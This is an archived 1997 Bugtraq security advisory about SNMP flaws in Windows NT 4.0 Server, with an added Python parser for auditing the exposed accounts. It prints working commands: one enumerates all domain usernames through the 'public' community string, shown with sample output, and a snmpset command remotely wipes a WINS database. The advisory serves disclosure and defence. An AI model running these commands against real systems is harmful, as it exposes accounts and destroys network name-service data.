SNMP holes in Windoze NT 4.0

Summary
Description: One bug described allows you to dump all domain usernames with snmpwalk. Another allows you to delete WINS database records remotely. Micro$oft is pathetic. Nobody should buy their products. Get Linux, or OpenBSD, or Solaris.
Author: "Rouland, Christopher J" <CRouland@EXAMNYC.lehman.com>
Compromise: Determine usernames, potential DoS
Vulnerable Systems: Those running WindoZe 4.0 Server with snmp
Date: 8 October 1997
Details


Date: Wed, 8 Oct 1997 19:08:37 -0500
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: SNMP Insecurity

---------- Forwarded message ----------
Date: Tue, 7 Oct 1997 15:36:13 -0400
From: "Rouland, Christopher J" <CRouland@EXAMNYC.lehman.com>
To: "'ntsecurity@iss.net'" <ntsecurity@iss.net>
Subject: [NTSEC] SNMP Insecurity

All:

I have found two significant "features" in the SNMP agent
implementations under NT 4.0 Server, and I am sure there are more if I
feel like really digging.  The first issue I sent in earlier this year
to Microsoft and received no response other than "expected behavior", and
the second I just found, and it puts any large NT shop at a serious denial
of service (DoS) risk.

1. This first exploit demonstrates the ability via SNMP to dump a list
of all usernames in an NT domain (assuming the target box is a DC) or on
an NT Server.

Here is the simplest NT example I could find to use this:

C:\NTRESKIT>snmputil walk <hostname> public .1.3.6.1.4.1.77.1.2.25

<hostname> should be a domain controller or server

Sample output at end of message.

2. The second exploit demonstrates the ability via SNMP to delete all of
the records in a WINS database remotely, bypassing all NT security.  If
you understand large scale WINS architecture, you can understand the
implications of this.  Knowledge of SNMP community strings would allow
an attacker to effectively shut down any large NT infrastructure with
"N" commands (N=number of WINS servers).  This is permitted due to the
extensive "cmd" set implemented in the WINS extension agent,
specifically:

 cmdDeleteWins OBJECT-TYPE
              SYNTAX  IpAddress
              ACCESS  read-write
              STATUS  mandatory
              DESCRIPTION
                        "This variable when set will cause all information
                         pertaining to a WINS (data records, context
                         information to be deleted from the local WINS.
                         Use this only when owner-address mapping table is
                         getting to near capacity. NOTE: deletion of all
                         information pertaining to the managed WINS is not
                         permitted"
              ::= { cmd 3 }

Since the SNMP toolset implemented under NT will not do
snmp-set-requests, my sample exploit was done using the CMU SNMP
development kit under Unix.  The command

rnjdev02:~/cmu$ snmpset -v 1 192.178.16.2 public .1.3.6.1.4.1.311.1.2.5.3.0 a 192.178.16.2

successfully deleted my entire WINS database.


3.  It appears that there are several other pieces of the LMMIB2
definition that allow for things such as remote session deletion or
disconnect, etc, but I have not yet looked into them.

4.   The simplest fix is to disable SNMP, or to remove the extension
agents through the SNMP configuration in the registry.


Regards,

Chris

--
Chris Rouland
Lehman Brothers, Inc.
crouland@lehman.com

-----


C:\NTRESKIT>snmputil walk 192.178.16.2 public .1.3.6.1.4.1.77.1.2.25

Output:

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.71.117.101.115.116
Value    = OCTET STRING - Guest

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.49
Value    = OCTET STRING - test1

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.50
Value    = OCTET STRING - test2

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.51
Value    = OCTET STRING - test3

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.52
Value    = OCTET STRING - test4

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.53
Value    = OCTET STRING - test5

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.54
Value    = OCTET STRING - test6

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.55
Value    = OCTET STRING - test7

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.56
Value    = OCTET STRING - test8

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.57
Value    = OCTET STRING - test9

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.6.116.101.115.116.49.48
Value    = OCTET STRING - test10

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.8.116.101.115.116.117.115.101.114
Value    = OCTET STRING - testuser

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.13.65.100.109.105.110.105.115.116.114.97.116.111.114
Value    = OCTET STRING - Administrator

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.13.73.85.83.82.95.82.78.74.68.69.86.48.49
Value    = OCTET STRING - IUSR_NT4SRVDEV1

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.19.83.81.76.69.120.101.99.117.116.105.118.101.67.109.100.69.120.101.99
Value    = OCTET STRING - SQLExecutiveCmdExec

End of MIB subtree.
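Added example, not part of the original post: a small Python parser for snmputil walk output in the format shown above. It decodes the svUserName table index (the first sub-identifier is the string length, the rest are the ASCII codes of the name) back into the username and flags the default and service accounts an administrator would want to know are exposed by a read-only community string. The sample input is constructed here, with each OID on one line (the post's output was line-wrapped by the mail client).

```python
import re

# Constructed sample in the format snmputil prints (assumption: one OID per
# line; the original post's output was line-wrapped by the mail client).
SAMPLE_WALK = """\
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.71.117.101.115.116
Value    = OCTET STRING - Guest
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.13.65.100.109.105.110.105.115.116.114.97.116.111.114
Value    = OCTET STRING - Administrator
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.49
Value    = OCTET STRING - test1
End of MIB subtree.
"""

INDEX_RE = re.compile(r"svUserName\.((?:\d+\.)*\d+)\s*$")
VALUE_RE = re.compile(r"^Value\s*=\s*OCTET STRING - (.*)$")


def decode_index(suffix):
    """Decode a svUserName index '<len>.<byte>.<byte>...' into a str.
    The first sub-identifier is the length, the rest are ASCII codes,
    e.g. 5.71.117.101.115.116 -> 'Guest'."""
    parts = [int(p) for p in suffix.split(".")]
    length, codes = parts[0], parts[1:]
    if length != len(codes):
        raise ValueError(f"index says {length} bytes, got {len(codes)}")
    return bytes(codes).decode("ascii")


def parse_walk(text):
    """Pair each decoded index with the value the agent reported for it."""
    rows, pending = [], None
    for line in text.splitlines():
        m = INDEX_RE.search(line)
        if m:
            pending = decode_index(m.group(1))
            continue
        m = VALUE_RE.match(line.strip())
        if m and pending is not None:
            rows.append((pending, m.group(1)))
            pending = None
    return rows


# Accounts whose presence in a walk is worth flagging during a review.
SENSITIVE_PREFIXES = ("Administrator", "Guest", "IUSR_")


def exposed_accounts(text):
    """Usernames from the walk that match the sensitive prefixes above."""
    return [v for _, v in parse_walk(text) if v.startswith(SENSITIVE_PREFIXES)]
```

Comparing the decoded index against the reported value in each pair is a cheap sanity check that the OID suffix really is the length-prefixed name and not something else in the table.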

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap.